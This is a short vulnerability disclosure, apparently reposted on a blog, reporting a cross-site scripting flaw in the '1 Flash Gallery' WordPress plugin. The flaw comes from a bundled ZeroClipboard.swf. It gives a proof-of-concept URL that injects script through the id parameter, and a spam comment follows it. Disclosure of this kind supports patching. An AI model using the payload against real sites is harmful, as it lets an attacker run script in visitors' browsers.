Wordpress Plugins - 1 Flash Gallery <== XSS
##################################################
# Description : Wordpress Plugins - 1 Flash Gallery <== XSS
# Version : -
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################
About:
1 Flash Gallery photo gallery plugin with slideshow function. It provides a comprehensive interface for managing
photos and images through a set of admin pages, and it displays image gallery in a way that makes your web site look
very nice. You can display galleries with a beautiful image gallery skins integrated with "1 Flash Gallery".
Vulnerabilities in the 1 Flash Gallery plugin for WordPress,
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.
Cross-Site Scripting vulnerabilities in ZeroClipboard(http://seclists.org/fulldisclosure/2013/Feb/103)
and in multiple web applications.
Affected products:
Vulnerable are all versions
Affected vendors:
1 Flash Gallery
http://1plugin.com/ /http://wordpress.org/plugins/1-flash-gallery/
Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard
POC:
http://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height
Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz
1 Flash Gallery photo gallery plugin with slideshow functiondofollow backlinks
ReplyDelete